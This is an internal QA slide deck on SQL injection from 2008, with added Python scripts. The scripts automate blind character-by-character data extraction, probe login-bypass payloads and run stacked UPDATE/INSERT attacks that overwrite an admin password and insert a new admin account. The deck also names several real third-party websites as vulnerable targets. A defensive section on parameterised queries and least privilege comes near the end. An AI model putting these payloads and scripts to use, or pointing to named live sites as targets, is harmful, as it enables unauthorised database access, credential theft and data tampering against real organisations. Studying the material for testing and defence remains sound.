
SQL Injections

Core QA Team
5th March 2008
Agenda

• What is SQL Injection
• SQL Injection possibilities
• Technologies affected by SQL Injections
• Types of SQL Injections
• Techniques in SQL Injections
• How to use Blind SQL Injections
• How to use SQL Injections
• How to use Advanced SQL Injections
• How to update data in the Database
• How to avoid SQL Injections
• Next generation of Hacking
• Tools for SQL Injections

©Copyright Kenexa® 2004
What is SQL Injection

• SQL Injection is one of the many web attack mechanisms used by attackers
to steal data from organizations. It is perhaps one of the most common
application layer attack techniques used today. It takes advantage of
improper coding of web applications: user input, say from a login form, is
pasted straight into a SQL statement, which lets the attacker inject SQL
commands of their own and gain access to the data held within the database.
• In essence, SQL Injection arises because the fields available for user
input allow SQL syntax to pass through and become part of the statement
that is sent to the database.

SQL Injection possibilities

• Using SQL injections, attackers can:
– Read data they are not authorised to see
• Perform a SELECT in the injected SQL
– Add new data to the database
• Could be embarrassing to find yourself selling politically incorrect
items on an eCommerce site
• Perform an INSERT in the injected SQL
– Modify data currently in the database
• Could be very costly to have an expensive item suddenly be deeply
'discounted'
• Perform an UPDATE in the injected SQL
– Often gain access to other users' system capabilities by obtaining
their passwords, or by bypassing the login check altogether

Technologies affected by SQL Injections

Any technology that builds SQL statements out of untrusted input is
affected, for example:
• JSP, ASP, XML
• XSL, JavaScript, VB
• MFC and other ODBC-based tools
• APIs and 3GL- and 4GL-based languages such as C, OCI, Pro*C, COBOL
and Perl
• CGI scripts that access Oracle databases
• and many more

Types of SQL Injections

• Blind SQL injections (the page reveals only whether an injected
condition was true or false)
• SQL injections (query results or error messages come back directly)
• Advanced SQL injections

Techniques in SQL Injections

• Authorization bypass
• Using the SELECT command
• Using the INSERT command
• Using SQL Server stored procedures

How to use Blind SQL injection

Step 1 - Many companies allow Internet access to archives of their press
releases. A URL for accessing the company's fifth press release might look
like this:
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5

Step 2 - Append a condition that is always true to the parameter and
request the page again:
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND 1=1
If this request returns the same press release, the parameter is being
pasted into the SQL statement and the application is susceptible to SQL
injection. (Request the URL once more with AND 1=2 to confirm that the
press release then disappears; otherwise the database may simply be
ignoring the extra text.)

Step 3 - We can use this behaviour to "ask" the database server true/false
questions. For instance, the following request essentially asks the
database server, "Is the current user dbo?"
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND USER_NAME() = 'dbo'
USER_NAME() is a SQL Server function that returns the name of the current
database user. If the current user is dbo (the database owner), the WHERE
clause is true and the fifth press release is returned. If not, the query
returns no rows and no press release is displayed. Nothing is read from an
error message or from the data itself; the only signal is whether the page
changes, which is what makes the injection "blind".

Step 4 - By combining subqueries and functions, we can ask more complex
questions. The following example attempts to retrieve the name of a
user-created table, one character at a time:
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 109

Step 5 - If the server returns the fifth press release in response to this
URL, we know that the first letter of the query's result comes after the
letter "m" (ASCII 109) in the alphabet. By making multiple requests, we can
narrow this down to the precise ASCII value:
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116

Step 6 - If no press release is returned this time, the ASCII value is
greater than 109 but not greater than 116, so the letter is between "n"
(110) and "t" (116). Split that range again:
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 113
Every request halves the remaining range, so each character costs at most
seven requests for a 128-value alphabet. Repeating the process for
positions 2, 3, ... of the substring recovers the whole table name, and the
same technique extracts any value the injected subquery can select.
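The six steps above, run end to end as an added Python example (this is not code from the original deck). It assumes a hypothetical pressRelease handler that concatenates the pressReleaseID parameter into its query, exactly as the slides describe, and uses an in-memory sqlite3 database in place of SQL Server: sqlite_master stands in for sysobjects, and substr()/unicode() for substring()/ascii(). The sample tables are constructed for the example.

```python
"""Blind SQL injection: true/false oracle plus per-character binary search."""
from __future__ import annotations

import sqlite3

# Constructed sample data: the press releases the site serves, plus a table
# whose name the attacker does not know yet and wants to recover.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
CREATE TABLE press_release (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO press_release VALUES (5, 'Fifth press release');
CREATE TABLE admin_login (login_id INTEGER PRIMARY KEY, login_name TEXT, password TEXT);
INSERT INTO admin_login VALUES (1, 'neo', 's3cret');
""")

REQUESTS = 0  # how many HTTP requests the attack would have needed


def press_release_page(press_release_id: str) -> str | None:
    """Hypothetical vulnerable handler for pressRelease.jsp?pressReleaseID=...
    The parameter is pasted into the SQL text, so everything after the
    number becomes part of the WHERE clause. Returns the title or None."""
    sql = "SELECT title FROM press_release WHERE id = " + press_release_id
    row = CONN.execute(sql).fetchone()
    return row[0] if row else None


def ask(condition: str) -> bool:
    """Step 3: ask the database a yes/no question. The only signal is whether
    the fifth press release still comes back once the condition is ANDed
    onto the query; no error text or data is ever shown directly."""
    global REQUESTS
    REQUESTS += 1
    return press_release_page("5 AND (" + condition + ")") is not None


def request_count() -> int:
    return REQUESTS


def is_injectable() -> bool:
    """Step 2, done properly: a true condition must keep the page and a
    false one must remove it, otherwise the parameter is not reaching SQL."""
    return ask("1=1") and not ask("1=2")


def extract_char(subquery: str, position: int) -> str | None:
    """Steps 4-6: recover one character of the subquery's result by binary
    search over its code point. Past the end of the string substr() yields
    '' and unicode('') is NULL, so every comparison is false and we return
    None; that is how the caller learns the string has ended."""
    expr = "unicode(substr((" + subquery + "), " + str(position) + ", 1))"
    if not ask(expr + " >= 0"):
        return None
    lo, hi = 0, 127                      # 7-bit ASCII, as the slides assume
    while lo < hi:                       # invariant: lo <= code point <= hi
        mid = (lo + hi) // 2
        if ask(expr + " > " + str(mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_string(subquery: str, max_len: int = 64) -> str:
    """Walk positions 1, 2, ... of the result until it runs out."""
    chars = []
    for position in range(1, max_len + 1):
        ch = extract_char(subquery, position)
        if ch is None:
            break
        chars.append(ch)
    return "".join(chars)


# sqlite3's equivalent of: SELECT TOP 1 name FROM sysobjects WHERE xtype='U'
FIRST_TABLE = "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1"

if __name__ == "__main__":
    print("injectable:", is_injectable())
    print("first table:", extract_string(FIRST_TABLE), "in", request_count(), "requests")
```

Each character costs one request to test for end-of-string plus seven for the binary search, so the eleven-character table name above is recovered in 89 requests; against a real site the same loop would wrap an HTTP client and compare response bodies instead of calling the handler directly.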

URLs vulnerable to Blind SQL Injection attack (as listed in this deck)

http://www.bharatstudent.com/cafebharat/cafebharat.php?cat=2%20and%2

http://content-ind.cricinfo.com/wivzimsa/engine/current/match/298809.htm

http://www.minglebox.com/user.do?method=registerUser&error=true%20an

How to use SQL injections

• Here is a sample basic HTML form with two inputs, login and password:

<form method="post" action="http://testasp.acunetix.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>

• The easiest way for login.asp to work is by building a database query
that looks like this:
SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password'
• If the variables $username and $password are taken directly from the
user's input, this can easily be compromised. Suppose that we gave "Joe"
as a username and that the following string was provided as a password:
anything' OR 'x'='x

SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x'

• As the inputs of the web application are not properly sanitised, the
single quote closes the string literal and turns the WHERE clause into a
two-component clause joined by OR.
• The 'x'='x' part is guaranteed to be true regardless of what the first
part contains, so the query returns the first id in the logins table.
• This allows the attacker to bypass the login form without knowing a
valid username / password combination!
• Depending on the actual SQL query (which quote character it uses,
whether the value sits inside parentheses, and whether the database
honours -- comments), you may have to try some of these possibilities:
' or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
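The login bypass described above, as an added Python example (not code from the original deck): the spliced query beside the parameterised fix, and the payload list tried in each field. It assumes a hypothetical logins table with a single user and uses an in-memory sqlite3 database in place of the ASP/SQL Server back end; the payload strings are the ones listed on the slide.

```python
"""Login bypass: vulnerable string-built query vs bound parameters."""
import sqlite3

# Constructed sample table with one valid account.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO logins VALUES (1, 'Joe', 's3cret');
""")


def build_query(username: str, password: str) -> str:
    """The SQL login.asp sends when it splices the form fields into the text."""
    return ("SELECT id FROM logins WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(username: str, password: str):
    """Runs the spliced query. Returns the matched id, or None; raises
    sqlite3.OperationalError when a payload breaks the SQL syntax."""
    row = CONN.execute(build_query(username, password)).fetchone()
    return row[0] if row else None


def login_fixed(username: str, password: str):
    """Same query with bound parameters: the driver sends the values apart
    from the SQL text, so a quote in the input is only data."""
    row = CONN.execute(
        "SELECT id FROM logins WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


SLIDE_PAYLOADS = ["' or 1=1--", "or 1=1--", "' or 'a'='a", '" or "a"="a',
                  "') or ('a'='a"]


def probe(field: str, payloads=SLIDE_PAYLOADS) -> dict:
    """Try each payload in the given field ('username' or 'password') of the
    vulnerable login and classify the outcome:
      'bypass' - a row came back without a valid credential
      'error'  - the SQL no longer parses (quote/parenthesis mismatch)
      'none'   - the payload was treated as an ordinary string"""
    results = {}
    for payload in payloads:
        if field == "username":
            user, pw = payload, "wrong"
        else:
            user, pw = "Joe", payload
        try:
            hit = login_vulnerable(user, pw)
        except sqlite3.OperationalError:
            results[payload] = "error"
            continue
        results[payload] = "bypass" if hit is not None else "none"
    return results


if __name__ == "__main__":
    print(build_query("Joe", "anything' OR 'x'='x"))
    print("vulnerable:", login_vulnerable("Joe", "anything' OR 'x'='x"))
    print("fixed:     ", login_fixed("Joe", "anything' OR 'x'='x"))
    for field in ("username", "password"):
        print(field, probe(field))
```

Running probe() shows why the slide offers several variants: ' or 'a'='a bypasses the check in the password field but not in the username field, because AND binds tighter than OR and the password comparison is still enforced; ' or 1=1-- works in either field because the comment removes the rest of the clause; ') or ('a'='a only raises a syntax error here because this query has no parentheses to close.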
URLs vulnerable to SQL Injection attack (as listed in this deck)
http://www.osmania.ac.in/ou/res07/20080126.jsp

http://www.powerscrap.com/frame.aspx?Login=true

How to use Advanced SQL injections

• The attacker could log in as the first user in the 'users' table with
the following input (the -- comments out the rest of the statement,
including the password check):
Username: ' or 1=1--
• The attacker wants to establish the names of the tables that the query
operates on, and the names of the fields. To do this, the attacker uses
the 'having' clause of the 'select' statement:
Username: ' having 1=1--
A HAVING clause without a GROUP BY makes SQL Server reject the first column
of the select list, and the error message names it (for this query,
users.id).
• So the attacker now knows the table name and column name of the first
column in the query. They can continue through the columns by introducing
each field into a 'group by' clause, as follows:
Username: ' group by users.id having 1=1--
(which produces the error…)
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is
invalid in the select list because it is not contained in either an
aggregate function or the GROUP BY clause.
/process_login.asp, line 35

• Eventually the attacker arrives at the following 'username':
' group by users.id, users.username, users.password, users.privs having 1=1--
• … which produces no error, and is functionally equivalent to:
select * from users where username = ''
Every column in the select list is now known.

• It would be useful if the attacker could determine the types of each
column. This can be achieved using a 'type conversion' error message, like
this:
Username: ' union select sum(username) from users--
SQL Server tries to evaluate sum() before it checks that the two halves of
the UNION have the same number of columns, so the error it returns
complains that the aggregate cannot take a varchar argument, which reveals
the column's type.
How to update data in the Database

• Once we have gathered all the column names of a table, it is possible
for us to UPDATE or even INSERT a new record in the table: terminate the
original statement with a semicolon and stack our own after it (SQL
Server executes the whole batch in one request). For example, to change
the password for "neo":
http://duck/index.asp?id=10; UPDATE admin_login SET password = 'newpas5' WHERE login_name = 'neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (666, 'neo2', 'newpas5', 'NA')--
We can now log in as "neo2" with the password "newpas5".
The identifiers are deliberately unquoted: in T-SQL a single-quoted
'admin_login' is a string literal, not a table name, and the statement
would fail. Stacked statements also depend on the database API accepting
more than one statement per call; SQL Server does, but not every driver
does.
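The stacked UPDATE and INSERT above, replayed as an added Python example (not code from the original deck) beside the hardened handler that the "How to avoid SQL Injections" section calls for. It assumes a hypothetical index.asp-style page that concatenates ?id= into its query, an admin_login table with the columns the slides name, and a database API that runs several ';'-separated statements in one call: sqlite3's executescript() plays that role here, standing in for a SQL Server batch. The slides' trailing -- exists to comment out whatever SQL the page appends after the parameter; nothing follows the parameter in this handler, so the payloads omit it.

```python
"""Stacked queries through a numeric parameter, and the integer-cast fix."""
import sqlite3

# Constructed sample data: the page's own table plus the admin table.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
CREATE TABLE news (id INTEGER PRIMARY KEY, body TEXT);
INSERT INTO news VALUES (10, 'Tenth article');
CREATE TABLE admin_login (login_id INTEGER PRIMARY KEY, login_name TEXT,
                          password TEXT, details TEXT);
INSERT INTO admin_login VALUES (1, 'neo', 'original', 'site admin');
""")

# The slides' two payloads (identifiers unquoted; no trailing -- needed here).
UPDATE_PAYLOAD = "10; UPDATE admin_login SET password = 'newpas5' WHERE login_name = 'neo'"
INSERT_PAYLOAD = ("10; INSERT INTO admin_login (login_id, login_name, password, details) "
                  "VALUES (666, 'neo2', 'newpas5', 'NA')")


def show_news_vulnerable(raw_id: str) -> None:
    """Hypothetical vulnerable handler: the id parameter is pasted into the
    SQL and the whole string goes to a batch-executing API, so a ';' in the
    parameter lets the attacker append any statement they like."""
    CONN.executescript("SELECT body FROM news WHERE id = " + raw_id)


def show_news_fixed(raw_id: str):
    """The same page hardened as the slides advise: convert the value to an
    integer in application code before it goes anywhere near SQL, then bind
    it as a parameter. int() raises ValueError on '10; UPDATE ...', and
    execute() refuses to run more than one statement in any case."""
    news_id = int(raw_id)
    row = CONN.execute("SELECT body FROM news WHERE id = ?", (news_id,)).fetchone()
    return row[0] if row else None


def password_of(login_name: str):
    """Read the admin table the way the attacker would after logging in."""
    row = CONN.execute("SELECT password FROM admin_login WHERE login_name = ?",
                       (login_name,)).fetchone()
    return row[0] if row else None


def login_ok(login_name: str, password: str) -> bool:
    """Parameterised login check, used to show the injected row is usable."""
    row = CONN.execute(
        "SELECT 1 FROM admin_login WHERE login_name = ? AND password = ?",
        (login_name, password)).fetchone()
    return row is not None


def run_attack() -> dict:
    """Replay the slide's two requests against the vulnerable page and
    report what changed in admin_login."""
    before = password_of("neo")
    show_news_vulnerable(UPDATE_PAYLOAD)
    show_news_vulnerable(INSERT_PAYLOAD)
    return {"neo_before": before, "neo_after": password_of("neo"),
            "neo2_can_login": login_ok("neo2", "newpas5")}


def fixed_rejects(raw_id: str) -> bool:
    """True when the hardened handler refuses the value before any SQL runs."""
    try:
        show_news_fixed(raw_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("fixed page:", show_news_fixed("10"), "| rejects payload:", fixed_rejects(UPDATE_PAYLOAD))
    print("vulnerable page:", run_attack())
```

The integer conversion happens in application code, not in SQL: a check such as ISNUMERIC accepts far more than integers, while int() either yields a number that cannot carry SQL syntax or raises before the query is built.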

How to avoid SQL Injections

• The robust fix is to stop building SQL out of strings: use parameterised
queries (prepared statements), or stored procedures called with bound
parameters, so that user input reaches the database as data and can never
change the structure of the statement.
• As defence in depth, filter out characters like single quote, double
quote, slash, backslash and semicolon, and extended characters like NULL,
carriage return and new line, in all strings from:
- Input from users
- Parameters from URL
- Values from cookies
Do not rely on such a blacklist on its own; it is easy to get wrong and is
routinely bypassed.
• For numeric values, convert the value to an integer in the application
before putting it into the SQL statement. ISNUMERIC is not an integer
check (it also accepts values such as '1e3' or '$'), so do not use it as
one.
• Run SQL Server under a low-privilege account: change "Startup and run
SQL Server" in the SQL Server Security tab to a low-privilege user, and
give the application's database login only the rights it needs.
• Disable or delete the extended stored procedures you are not using,
such as master..xp_cmdshell, xp_startmail, xp_sendmail and sp_makewebtask.

Next generation of Hacking

• Ethical Hacking
• Server side scripting
• Client side scripting
• Bluetooth Hacking
• Console Hacking

Tools for SQL Injection

• SQID - SQL Injection Digger
• SQLBrute - SQL Injection Brute Force Tool
• N-Stalker Web Application Security Scanner 2006
• Acunetix Web Vulnerability Scanner
• HP WebInspect
• Wikto: Web Server Assessment Tool
